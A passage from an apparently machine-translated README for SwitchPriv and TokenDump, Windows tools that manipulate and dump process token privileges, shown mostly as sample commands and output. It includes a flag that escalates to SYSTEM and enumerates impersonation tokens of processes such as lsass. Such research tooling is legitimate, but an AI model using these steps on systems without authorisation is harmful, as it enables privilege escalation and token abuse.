SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Disabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -r inc

[>] Trying to remove a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 4 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name          State
======================= ==========================
SeShutdownPrivilege     Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege       Enabled
SeTimeZonePrivilege     Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

如果要測試特定特權,則可以刪除除了要使用-f選項測試以下測試以外的所有特權: 

 PS C:Dev> .SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Enabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege           Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:Dev> .SwitchPriv.exe -f tim

[>] Trying to remove all token privileges except one.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.

PS C:Dev> .SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 4392
    [*] Process Name : powershell
[+] Got 1 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name      State
=================== =======
SeTimeZonePrivilege Enabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

您可以使用逗號分離的值來過濾多個特權,如下所示: 

 PS C:Dev> .SwitchPriv.exe -p 24300 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 24300
    [*] Process Name : powershell
[+] Got 24 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeIncreaseQuotaPrivilege                  Disabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  Disabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           Disabled
SeIncreaseBasePriorityPrivilege           Disabled
SeCreatePagefilePrivilege                 Disabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeRemoteShutdownPrivilege                 Disabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege             Disabled
SeTimeZonePrivilege                       Disabled
SeCreateSymbolicLinkPrivilege             Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled

[*] Integrity Level : High Mandatory Level
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 24300 -f rest,back,deb

[>] Trying to remove all token privileges except one.
    [*] Target PID   : 24300
    [*] Process Name : powershell
[>] Trying to remove privileges other than follows.
    [*] SeBackupPrivilege
    [*] SeRestorePrivilege
    [*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 24300 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 24300
    [*] Process Name : powershell
[+] Got 3 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name            State
========================= ========
SeBackupPrivilege         Disabled
SeRestorePrivilege        Disabled
SeDebugPrivilege          Enabled

[*] Integrity Level : High Mandatory Level
[*] Done.

要啟用,禁用或刪除所有可用的代幣特權,請將all指定為--enable--disable--remove選項的值: 

 PS C:Dev> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
PS C:Dev> .SwitchPriv.exe -e all

[>] Trying to enable all token privileges.
    [*] Target PID   : 6772
    [*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.

PS C:Dev> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

要查找過程具有特定特權,請使用-s選項如下: 

 PS C:Dev> .SwitchPriv.exe -s createt

[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
    [*] Memory Compression (PID : 2548)
    [*] smss (PID : 372)
    [*] lsass (PID : 736)
    [*] csrss (PID : 584)
    [*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
    [*] System (PID : 4)
    [*] Idle (PID : 0)
[*] Done.


PS C:Dev> .SwitchPriv.exe -g -p 2548

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 2548
    [*] Process Name : Memory Compression
[+] Got 31 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeCreateTokenPrivilege                    Disabled
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege           Disabled
SeRelabelPrivilege                        Disabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

如果要設置完整性級別,請使用--integrity選項如下: 

 PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelMedium Mandatory Level                        Label            S-1-16-8192

PS C:Dev> .SwitchPriv.exe -i 1

[>] Trying to update Integrity Level.
    [*] Target PID   : 3436
    [*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.

PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelLow Mandatory Level                           Label            S-1-16-4096

要執行任何動作作為系統,請按下set -S標誌( SeDebugPrivilegeSeImpersonatePrivilege ): 

 PS C:Dev> .SwitchPriv.exe -g -p 2548 -S

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 2548
    [*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                            State
========================================= =========================
SeCreateTokenPrivilege                    Disabled
SeAssignPrimaryTokenPrivilege             Disabled
SeLockMemoryPrivilege                     EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege                  Disabled
SeTcbPrivilege                            EnabledByDefault, Enabled
SeSecurityPrivilege                       Disabled
SeTakeOwnershipPrivilege                  Disabled
SeLoadDriverPrivilege                     Disabled
SeSystemProfilePrivilege                  EnabledByDefault, Enabled
SeSystemtimePrivilege                     Disabled
SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
SeCreatePermanentPrivilege                EnabledByDefault, Enabled
SeBackupPrivilege                         Disabled
SeRestorePrivilege                        Disabled
SeShutdownPrivilege                       Disabled
SeDebugPrivilege                          EnabledByDefault, Enabled
SeAuditPrivilege                          EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege              Disabled
SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
SeUndockPrivilege                         Disabled
SeManageVolumePrivilege                   Disabled
SeImpersonatePrivilege                    EnabledByDefault, Enabled
SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege           Disabled
SeRelabelPrivilege                        Disabled
SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
SeTimeZonePrivilege                       EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled

[*] Integrity Level : System Mandatory Level
[*] Done.

Tokendump

回到頂部

專案

該工具是檢查令牌信息的實用程序: 

 C:Dev>.TokenDump.exe -h

TokenDump - Tool to dump processs token information.

Usage: TokenDump.exe [Options]

        -h, --help    : Displays this help message.
        -d, --debug   : Flag to enable SeDebugPrivilege.
        -e, --enum    : Flag to enumerate brief information tokens for processes or handles.
        -T, --thread  : Flag to scan thead tokens. Use with -e option.
        -H, --handle  : Flag to scan token handles. Use with -e option.
        -s, --scan    : Flag to get verbose information for a specific process, thread or handle.
        -a, --account : Specifies account name filter string. Use with -e flag.
        -p, --pid     : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
        -t, --tid     : Specifies a target TID in decimal format. Use with -s flag and -p option.
        -v, --value   : Specifies a token handle value in hex format. Use with -s flag and -p option.

要列舉所有流程的令牌,只需設置-e標誌: 

 C:Dev>.TokenDump.exe -e

[>] Trying to enumerate process token.

 PID Session Process Name                Token User                   Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004       0 svchost.exe                 NT AUTHORITYSYSTEM          System    False      False
3728       0 conhost.exe                 NT AUTHORITYSYSTEM          System    False      False

--snip--

6712       0 svchost.exe                 NT AUTHORITYLOCAL SERVICE   System    False      False
1972       0 svchost.exe                 NT AUTHORITYSYSTEM          System    False      False

[+] Got 129 token information.
[*] Found 7 account(s).
    [*] NT AUTHORITYSYSTEM
    [*] dev22h2user
    [*] NT AUTHORITYLOCAL SERVICE
    [*] NT AUTHORITYNETWORK SERVICE
    [*] Font Driver HostUMFD-0
    [*] Font Driver HostUMFD-1
    [*] Window ManagerDWM-1
[*] Done.

如果要啟用Sedebugprivilege,請設置-d標誌如下: 

 C:Dev>.TokenDump.exe -e -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Session Process Name                Token User                   Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004       0 svchost.exe                 NT AUTHORITYSYSTEM          System    False      False
3728       0 conhost.exe                 NT AUTHORITYSYSTEM          System    False      False
3740       0 vm3dservice.exe             NT AUTHORITYSYSTEM          System    False      False

--snip--

當用-e標誌設置-H標誌時,Tokendump試圖枚舉令牌處理信息: 

 C:Dev>.TokenDump.exe -e -H -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.

[Token Handle(s) - winlogon.exe (PID: 704)]

Handle Session Token User          Integrity Restricted AppContainer Token Type    Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
 0x2B0       1 NT AUTHORITYSYSTEM System    False      False        Primary       Anonymous
 0x2B4       1 NT AUTHORITYSYSTEM System    False      False        Primary       Anonymous
 0x38C       1 dev22h2user        Medium    False      False        Primary       Impersonation

--snip--

[Token Handle(s) - svchost.exe (PID: 3272)]

Handle Session Token User                 Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
 0x168       0 NT AUTHORITYLOCAL SERVICE System    False      False        Primary    Anonymous

[+] Got 819 handle(s).
[*] Found 8 account(s).
    [*] NT AUTHORITYSYSTEM
    [*] dev22h2user
    [*] Font Driver HostUMFD-1
    [*] Font Driver HostUMFD-0
    [*] NT AUTHORITYNETWORK SERVICE
    [*] Window ManagerDWM-1
    [*] NT AUTHORITYLOCAL SERVICE
    [*] NT AUTHORITYANONYMOUS LOGON
[*] Done.

當指定帶有-p選項的PID時,Tokendup僅列舉指定的過程句柄: 

 C:Dev>.TokenDump.exe -e -H -d -p 704

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.

[Token Handle(s) - winlogon.exe (PID: 704)]

Handle Session Token User          Integrity Restricted AppContainer Token Type    Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
 0x2B0       1 NT AUTHORITYSYSTEM System    False      False        Primary       Anonymous
 0x2B4       1 NT AUTHORITYSYSTEM System    False      False        Primary       Anonymous
 0x38C       1 dev22h2user        Medium    False      False        Primary       Impersonation
 0x398       1 dev22h2user        High      False      False        Primary       Identification
 0x3C4       1 dev22h2user        Medium    False      False        Impersonation Impersonation
 0x3C8       1 dev22h2user        Medium    False      False        Impersonation Impersonation
 0x3D0       1 dev22h2user        Medium    False      False        Impersonation Impersonation
 0x3D4       1 dev22h2user        Medium    False      False        Impersonation Impersonation

[+] Got 8 handle(s).
[*] Found 2 account(s).
    [*] NT AUTHORITYSYSTEM
    [*] dev22h2user
[*] Done.

要枚舉模擬的線程令牌,請設置-T標誌以及-e標誌,如下所示: 

 C:Dev>.TokenDump.exe -e -T -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.

 PID  TID Session Process Name Token User          Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
1952 2300       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
3516 4348       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation
3516 4656       0 svchost.exe  NT AUTHORITYSYSTEM System    Impersonation

[+] Got 4 thread(s).
[*] Found 1 account(s).
    [*] NT AUTHORITYSYSTEM
[*] Done.

如果要使用令牌用戶名過濾這些結果,請將過濾器字符串設置為-a選項值,如下所示: 

 C:Dev>.TokenDump.exe -e -a network -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.

 PID Session Process Name Token User                   Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False
3500       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False
2904       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False
2504       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False
7012       0 msdtc.exe    NT AUTHORITYNETWORK SERVICE System    False      False
7092       0 sppsvc.exe   NT AUTHORITYNETWORK SERVICE System    False      False
1676       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False
3584       0 WmiPrvSE.exe NT AUTHORITYNETWORK SERVICE System    False      False
1000       0 svchost.exe  NT AUTHORITYNETWORK SERVICE System    False      False

[+] Got 9 token information.
[*] Found 7 account(s).
    [*] NT AUTHORITYSYSTEM
    [*] dev22h2user
    [*] NT AUTHORITYLOCAL SERVICE
    [*] NT AUTHORITYNETWORK SERVICE
    [*] Font Driver HostUMFD-0
    [*] Font Driver HostUMFD-1
    [*] Window ManagerDWM-1
[*] Done.

C:Dev>.TokenDump.exe -e -a network -d -H

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.

[Token Handle(s) - lsass.exe (PID: 768)]

Handle Session Token User                   Integrity Restricted AppContainer Token Type    Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
 0x914       0 NT AUTHORITYNETWORK SERVICE System    False      False        Impersonation Impersonation

--snip--

[Token Handle(s) - msdtc.exe (PID: 7012)]

Handle Session Token User                   Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
 0x23C       0 NT AUTHORITYNETWORK SERVICE System    False      False        Primary    Anonymous

[+] Got 27 handle(s).
[*] Found 8 account(s).
    [*] NT AUTHORITYSYSTEM
    [*] dev22h2user
    [*] Font Driver HostUMFD-1
    [*] Font Driver HostUMFD-0
    [*] NT AUTHORITYNETWORK SERVICE
    [*] Window ManagerDWM-1
    [*] NT AUTHORITYLOCAL SERVICE
    [*] NT AUTHORITYANONYMOUS LOGON
[*] Done.

要獲取特定過程的詳細信息,請將-s標誌設置為-p選項值: 

 C:Dev>.TokenDump.exe -s -p 5996

[>] Trying to dump process token information.

[Token Information for StartMenuExperienceHost.exe (PID: 5996)]

ImageFilePath       : C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe
CommandLine         : "C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User          : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner         : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group       : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type          : Primary
Impersonation Level : Anonymous
Token ID            : 0x0000000000063D9A
Authentication ID   : 0x000000000001DFE5
Original ID         : 0x00000000000003E7
Modified ID         : 0x0000000000063D24
Integrity Level     : Low
Protection Level    : N/A
Session ID          : 1
Elevation Type      : Limited
Mandatory Policy    : NoWriteUp
Elevated            : False
AppContainer        : True
TokenFlags          : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name   : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID    : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token    : True
Token Source        : User32
Token Source ID     : 0x000000000001DE9D


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                State
    ============================= =========================
    SeChangeNotifyPrivilege       EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    dev22h2None                                                  Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLocal account and member of Administrators group UseForDenyOnly
    BUILTINAdministrators                                        UseForDenyOnly
    BUILTINUsers                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYINTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYAuthenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYThis Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLocal account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLogonSessionId_0_122425                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYNTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory LabelLow Mandatory Level                           Integrity, IntegrityEnabled


    APPCONTAINER CAPABILITIES
    -------------------------

    Capability Name                                                            Flags
    ========================================================================== =======
    APPLICATION PACKAGE AUTHORITYYour Internet connection                     Enabled
    APPLICATION PACKAGE AUTHORITYYour home or work networks                   Enabled
    NAMED CAPABILITIESPackageQuery                                            Enabled
    NAMED CAPABILITIESActivitySystem                                          Enabled
    NAMED CAPABILITIESPreviewStore                                            Enabled
    NAMED CAPABILITIESCortanaPermissions                                      Enabled
    NAMED CAPABILITIESAppointmentsSystem                                      Enabled
    NAMED CAPABILITIESTeamEditionExperience                                   Enabled
    NAMED CAPABILITIESShellExperience                                         Enabled
    NAMED CAPABILITIESPackageContents                                         Enabled
    NAMED CAPABILITIESVisualElementsSystem                                    Enabled
    NAMED CAPABILITIESUserAccountInformation                                  Enabled
    NAMED CAPABILITIESActivityData                                            Enabled
    NAMED CAPABILITIESCloudStore                                              Enabled
    NAMED CAPABILITIESTargetedContent                                         Enabled
    NAMED CAPABILITIESStoreAppInstall                                         Enabled
    NAMED CAPABILITIESStoreLicenseManagement                                  Enabled
    NAMED CAPABILITIESCortanaSettings                                         Enabled
    NAMED CAPABILITIESDependencyTarget                                        Enabled
    NAMED CAPABILITIESSearchSettings                                          Enabled
    NAMED CAPABILITIESCellularData                                            Enabled
    NAMED CAPABILITIESWifiData                                                Enabled
    PACKAGE CAPABILITYmicrosoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
    NAMED CAPABILITIESAccessoryManager                                        Enabled
    NAMED CAPABILITIESUserAccountInformation                                  Enabled


    DACL INFORMATION
    ----------------

    Account Name                                            Access                      Flags Type
    ======================================================= =========================== ===== =============
    dev22h2user                                            GenericAll                  None  AccessAllowed
    NT AUTHORITYSYSTEM                                     GenericAll                  None  AccessAllowed
    NT AUTHORITYLogonSessionId_0_122425                    GenericExecute, GenericRead None  AccessAllowed
    microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll                  None  AccessAllowed


    SECURITY ATTRIBUTES INFORMATION
    -------------------------------

    [*] WIN://SYSAPPID
        Flags : None
        Type  : String
            Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
            Value[0x01] : App
            Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy

    [*] WIN://PKG
        Flags : None
        Type  : UInt64
            Value[0x00] : 0x0000000200000001

    [*] WIN://PKGHOSTID
        Flags : None
        Type  : UInt64
            Value[0x00] : 0x1000000000000001

    [*] TSA://ProcUnique
        Flags : NonInheritable, Unique
        Type  : UInt64
            Value[0x00] : 0x0000000000000041
            Value[0x01] : 0x0000000000063D9B



[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]

Token User          : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner         : BUILTINAdministrators (SID: S-1-5-32-544)
Primary Group       : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type          : Impersonation
Impersonation Level : Identification
Token ID            : 0x000000000016ECE6
Authentication ID   : 0x000000000001DF83
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000001DFE4
Integrity Level     : High
Protection Level    : N/A
Session ID          : 1
Elevation Type      : Full
Mandatory Policy    : NoWriteUp, NewProcessMin
Elevated            : True
AppContainer        : False
TokenFlags          : NotLow
Token Source        : User32
Token Source ID     : 0x000000000001DE9D


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                            State
    ========================================= =========================
    SeIncreaseQuotaPrivilege                  Disabled
    SeSecurityPrivilege                       Disabled
    SeTakeOwnershipPrivilege                  Disabled
    SeLoadDriverPrivilege                     Disabled
    SeSystemProfilePrivilege                  Disabled
    SeSystemtimePrivilege                     Disabled
    SeProfileSingleProcessPrivilege           Disabled
    SeIncreaseBasePriorityPrivilege           Disabled
    SeCreatePagefilePrivilege                 Disabled
    SeBackupPrivilege                         Disabled
    SeRestorePrivilege                        Disabled
    SeShutdownPrivilege                       Disabled
    SeDebugPrivilege                          Disabled
    SeSystemEnvironmentPrivilege              Disabled
    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
    SeRemoteShutdownPrivilege                 Disabled
    SeUndockPrivilege                         Disabled
    SeManageVolumePrivilege                   Disabled
    SeImpersonatePrivilege                    EnabledByDefault, Enabled
    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege             Disabled
    SeTimeZonePrivilege                       Disabled
    SeCreateSymbolicLinkPrivilege             Disabled
    SeDelegateSessionUserImpersonatePrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    dev22h2None                                                  Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLocal account and member of Administrators group Mandatory, EnabledByDefault, Enabled
    BUILTINAdministrators                                        Mandatory, EnabledByDefault, Enabled, Owner
    BUILTINUsers                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYINTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYAuthenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYThis Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLocal account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYLogonSessionId_0_122425                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
    NT AUTHORITYNTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory LabelHigh Mandatory Level                          Integrity, IntegrityEnabled


    DACL INFORMATION
    ----------------

    Account Name                         Access                      Flags Type
    ==================================== =========================== ===== =============
    BUILTINAdministrators               GenericAll                  None  AccessAllowed
    NT AUTHORITYSYSTEM                  GenericAll                  None  AccessAllowed
    NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None  AccessAllowed


    SECURITY ATTRIBUTES INFORMATION
    -------------------------------

    [*] WIN://SYSAPPID
        Flags : None
        Type  : String
            Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
            Value[0x01] : App
            Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy

    [*] WIN://PKG
        Flags : None
        Type  : UInt64
            Value[0x00] : 0x0000000200000001

    [*] WIN://PKGHOSTID
        Flags : None
        Type  : UInt64
            Value[0x00] : 0x1000000000000001

    [*] TSA://ProcUnique
        Flags : NonInheritable, Unique
        Type  : UInt64
            Value[0x00] : 0x0000000000000041
            Value[0x01] : 0x0000000000063D9B


[*] Done.

如果將特定過程中的句柄值設置為-v選項,而PID為-p選項以及-s標誌,則此工具為句柄獲取詳細信息,如下所示: 

 C:Dev>.TokenDump.exe -s -p 7012 -v 0x23C -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.

[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]

Token User          : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Owner         : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Primary Group       : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Type          : Primary
Impersonation Level : Anonymous
Token ID            : 0x000000000007DF17
Authentication ID   : 0x00000000000003E4
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000007DEE2
Integrity Level     : System
Protection Level    : N/A
Session ID          : 0
Elevation Type      : Default
Mandatory Policy    : NoWriteUp, NewProcessMin
Elevated            : False
AppContainer        : False
TokenFlags          : IsFiltered, NotLow
Has Linked Token    : False
Token Source        : N/A
Token Source ID     : N/A


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name          State
    ======================= =========================
